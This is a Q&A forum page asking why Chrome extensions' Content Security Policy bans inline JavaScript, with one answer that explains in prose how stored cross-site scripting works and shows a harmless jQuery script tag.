Home/ Questions/Q 8368267
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-09T13:20:45+00:00

I’m reading Chrome extension document Content Security Policy (CSP) . It says: Inline JavaScript,

  • 0

I’m reading Chrome extension document “Content Security Policy (CSP)“. It says:

Inline JavaScript, as well as dangerous string-to-JavaScript methods
like eval, will not be executed. This restriction bans both inline
blocks and inline event handlers (e.g. <button
onclick="...">).

There is no mechanism for relaxing the restriction against executing
inline JavaScript. In particular, setting a script policy that
includes unsafe-inline will have no effect. This is intentional.

Why are inline <script> blocks unsafe? Can anyone explain it? It will be better if you can give examples.

Thank you.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    As the page says:

    The first restriction wipes out a huge class of cross-site scripting
    attacks by making it impossible for you to accidentally execute script
    provided by a malicious third-party.

    Basically any script you load needs to be in a separate file accessible locally to the extension. This prevents you from loading 3rd party scripts that get injected into your page or including them like:

    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>

    An example of this is if you have a form a user can fill out. The user can enter a script tag with some JS in it. Let’s say it’s like a discussion forum. I go in and make a topic but it has some hidden JS in it. Let’s also assume you don’t clean that out before posting it. Now my post has JS that will execute every time somebody views it. This prevents that script from being executed.

    • 0